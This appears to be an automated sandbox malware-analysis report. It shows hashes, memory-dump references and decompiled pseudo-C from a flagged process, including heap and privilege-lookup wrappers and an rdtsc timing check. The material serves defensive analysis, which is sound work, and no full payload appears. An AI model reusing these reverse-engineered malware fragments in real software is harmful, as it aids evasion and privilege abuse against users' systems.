Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 025907AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025907B7

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0258FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0258FADB

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0258FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0258FAF3

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0258FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0258FB73

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0258FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0258FBC3

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0258F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0258F9FB

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0258FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0258FEDB

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0258FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0258FFBF

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 0258FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0258FC6B

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0258FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0258FDCB

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 724888D0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E724888D0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E72486E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E72487030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E7249A100( &_v284, 0x104);
						E7249A770( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E72493DF0(E72493D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E72487060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E724870E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x724888db
0x724888e3
0x724888e5
0x724888ea
0x724888ef
0x72488902
0x72488907
0x72488910
0x7248891c
0x7248892f
0x72488934
0x72488937
0x72488940
0x72488952
0x72488957
0x7248895c
0x00000000
0x00000000
0x7248895e
0x72488962
0x00000000
0x00000000
0x72488964
0x00000000
0x72488962
0x72488966
0x72488969
0x7248896f
0x72488971
0x7248897c
0x72488981
0x72488984
0x72488991
0x7248899c
0x7248899e
0x724889a4
0x724889a8
0x724889ab
0x724889ab
0x724889b2
0x724889b5
0x724889ba
0x724889c7
0x724888f6
0x724888f6
0x724888f6

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 288e62ee0fdbe8756f45e8a145c5f78f9cc3ec81abe2d106fbbf9ecc9082e93c
Instruction ID: 1934fd96053c3b76128060e1d2b4f0c9c2f35640d7a3cbad08dc9560945a6d3a
Opcode Fuzzy Hash: 288e62ee0fdbe8756f45e8a145c5f78f9cc3ec81abe2d106fbbf9ecc9082e93c
Instruction Fuzzy Hash: 102127B3C5021C5BCB15C66CED51BEF7BBDAF41304F0405ADE98A93240F635AB498BA2

Uniqueness

Uniqueness Score: -1.00%

Function 724988B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E724988B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E724991E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x72493536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x724988c7
0x724988d2
0x724988dd
0x724988e1

APIs

RtlAllocateHeap.NTDLL(65Ir,?,72493CAF,72493CAF,?,72493536,?,?,?,?,?,00000000,72488B13,?), ref: 724988DD

Strings

65Ir, xrefs: 724988D2, 724988DC

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65Ir
API String ID: 1279760036-1226095430
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 8bda809eb0cbeda16b847adcc270f17c54dd631a9ce1f5803aded0c41d729ae0
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 84E012B1200208ABDB14DF99CC45EA77BACAF88650F118558FA085B241CA30FA10CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 72498922, Relevance: 1.5, APIs: 1, Instructions: 31
memoryCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E72498922(void* __eax, void* __ecx, void* __edi, void* __esi, void* _a4, long _a8, void* _a12, void* _a877535884) {
				intOrPtr _v0;
				char _t19;

				_push(__edi);
				if(__ecx + 1 != 0) {
					asm("invalid");
					_t16 = _v0;
					_push(__eax);
					_t5 = _t16 + 0xc74; // 0xc74
					E724991E0(__edi, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
					_t19 = RtlFreeHeap(_a4, _a8, _a12); // executed
					return _t19;
				} else {
					asm("iretd");
					__ebp = __esp;
					__eax = _v0;
					__ecx =  *((intOrPtr*)(__eax + 0xa14));
					__esi = __eax + 0xc7c;
					__eax =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a4, __ebp);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}

0x72498922
0x7249892d
0x724988ee
0x724988f3
0x724988f9
0x724988ff
0x72498907
0x7249891d
0x72498921
0x7249892f
0x7249892f
0x72498931
0x72498933
0x72498936
0x72498942
0x72498952
0x72498958
0x7249895a
0x7249895b
0x7249895c
0x7249895c

APIs

RtlFreeHeap.NTDLL(00000060,72488B13,?,?,72488B13,00000060,00000000,00000000,?,?,72488B13,?,00000000), ref: 7249891D

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a653cd2de2404513f09ce9162d2afa26f5595cfd4e006bb174b6c19aa3b3dc8f
Instruction ID: 2ec9996dabc056e2169adec53288e304743c77f013ddee4bba478f6ee7995407
Opcode Fuzzy Hash: a653cd2de2404513f09ce9162d2afa26f5595cfd4e006bb174b6c19aa3b3dc8f
Instruction Fuzzy Hash: E2F085B1204209ABCB19DF98CC49EAB3B69BF88750F008058FD489B252D630E902CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 724988E2, Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E724988E2(void* __eax, void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t12;
				void* _t18;

				asm("std");
				asm("invalid");
				_t9 = _a4;
				_t3 = _t9 + 0xc74; // 0xc74
				E724991E0(_t18, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}

0x724988ed
0x724988ee
0x724988f3
0x724988ff
0x72498907
0x7249891d
0x72498921

APIs

RtlFreeHeap.NTDLL(00000060,72488B13,?,?,72488B13,00000060,00000000,00000000,?,?,72488B13,?,00000000), ref: 7249891D

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 783c375c10af107dedab5bf5bf967814157e58bc7e1e1eaaaaf508fd879477a3
Instruction ID: 279ae8aedf847731490b25925f02c6821dc0c4993d491638859e24523a4ee969
Opcode Fuzzy Hash: 783c375c10af107dedab5bf5bf967814157e58bc7e1e1eaaaaf508fd879477a3
Instruction Fuzzy Hash: 78E06DBA244604BFD718DF98CC49EA7776DFF88350F014549F9689B355C630E914CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 72497ED0, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E72497ED0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _t12;
				void* _t17;
				intOrPtr* _t18;

				_t8 = _a4;
				_t18 = _a4 + 0xbbc;
				E724991E0(_t17, _t8, _t18,  *((intOrPtr*)(_t8 + 0x10)), 0, 7);
				_t12 =  *((intOrPtr*)( *_t18))(_a8, _a12, _a16, _a20); // executed
				return _t12;
			}

0x72497ed3
0x72497edf
0x72497ee7
0x72497f01
0x72497f05

APIs

RtlDosPathNameToNtPathName_U.NTDLL(72488B13,00000000,00000000,72488B13,00000000,00000000,72488B13,?,00000000), ref: 72497F01

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: Path$NameName_
String ID:
API String ID: 3514427675-0
Opcode ID: 0b98ad15841828ca5ddcf84ce11afcab491f7d4471edfa9e44c91c02bf0c7a33
Instruction ID: c9222683a8c3a145c9516d98d53028e0c85f09768c279f64324e017e8a48800f
Opcode Fuzzy Hash: 0b98ad15841828ca5ddcf84ce11afcab491f7d4471edfa9e44c91c02bf0c7a33
Instruction Fuzzy Hash: EAE01AB5600208AFDB14DF88CC85EA77BACEF88650F008458BA5897241C670F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 72498A50, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E72498A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E724991E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x72498a6a
0x72498a80
0x72498a84

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,7248CFC2,7248CFC2,00000041,00000000,?,72488B85), ref: 72498A80

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 42c8a8eda208aa3b7ea5a877baaf61df91258a5d744053e6be571dff2580eb6f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 4DE01AB12002086BDB10DF89CC85EE737ADAF88650F018154FA0857241C930E910CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 724988F0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E724988F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E724991E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x724988ff
0x72498907
0x7249891d
0x72498921

APIs

RtlFreeHeap.NTDLL(00000060,72488B13,?,?,72488B13,00000060,00000000,00000000,?,?,72488B13,?,00000000), ref: 7249891D

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: e4b5d75f35db6b71e24a6522f4d6610811bcdd7db99fa8933b0417ac63d5f9bc
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: F0E046B1200208ABDB18DF99CC49EA77BACEF88750F018558FE085B251CA30FA10CAF0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 025BC5F0, Relevance: 14.2, Strings: 11, Instructions: 424
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E025BC5F0(intOrPtr _a4, char _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v544;
				char _v1064;
				char _v1068;
				char _v1069;
				signed short* _v1076;
				signed short _v1080;
				intOrPtr _v1084;
				signed short _v1086;
				char _v1088;
				char _v1092;
				signed short _v1096;
				char _v1100;
				char* _v1104;
				short _v1106;
				char _v1108;
				char _v1111;
				char _v1112;
				signed short _v1116;
				char _v1120;
				intOrPtr _v1124;
				short _v1126;
				char _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				char _v1144;
				intOrPtr _v1148;
				short _v1150;
				char _v1152;
				char* _v1156;
				short _v1158;
				char _v1160;
				intOrPtr _v1164;
				intOrPtr _v1172;
				intOrPtr _v1176;
				char _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				char* _v1196;
				intOrPtr _v1200;
				char _v1204;
				char _v1212;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t173;
				intOrPtr _t175;
				void* _t191;
				void* _t193;
				intOrPtr _t200;
				char _t215;
				void* _t226;
				signed short _t250;
				void* _t284;
				signed short _t286;
				unsigned int _t292;
				short _t294;
				signed int _t295;
				void* _t296;

				_t173 =  *0x2672088; // 0x77fdf0e4
				_v8 = _t173 ^ _t295;
				_t175 = _a4;
				_t272 = _a8;
				_v1132 = _a16;
				_v1140 = _a20;
				_v1160 = 0;
				_v1158 = 0x208;
				_v1156 =  &_v1064;
				_t282 = 0;
				_t288 = 0;
				_t286 = _a12;
				_v1164 = _t175;
				_v1069 = 0;
				_v1068 = 0;
				_v1136 = 0;
				_v1088 = 0;
				_v1086 = 0;
				_v1084 = 0;
				_v1128 = 0;
				_v1126 = 0;
				_v1124 = 0;
				_v1144 = 0;
				if(_t175 == 0) {
					_t282 = 0;
					L66:
					_push(_t282);
					_push(_t286);
					_push(_t272);
					_push(_t175);
					E025E3F92(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
					_t288 = 0xc000000d;
					L18:
					if(_v1069 == 0) {
						L20:
						if(_v1084 != 0) {
							 *0x259e6f0(_v1084);
						}
						if(_v1068 != 0) {
							E0258F9F0(_v1068);
						}
						if(_v1136 != 0) {
							E0259E025(_t272,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v1136);
						}
						L23:
						return E0259E1B4(_t288, 0, _v8 ^ _t295, _t282, _t286, _t288);
					}
					L19:
					_v1120 = _v1144;
					_v1132(4,  &_v1120, _v1140);
					goto L20;
				}
				if(_t272 == 0 || _t286 < 1 || _t286 >  *((intOrPtr*)(_t175 + 4))) {
					_t282 =  *((intOrPtr*)(_t175 + 4));
					goto L66;
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(_t175 + 8)) + _t286 * 4)) != 0) {
						goto L23;
					}
					_t284 =  *((intOrPtr*)(_t272 + 0x18)) + _t272;
					_t191 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0xc)) + _t286 * 0x18 + _t272 + 0x10)) + _t272;
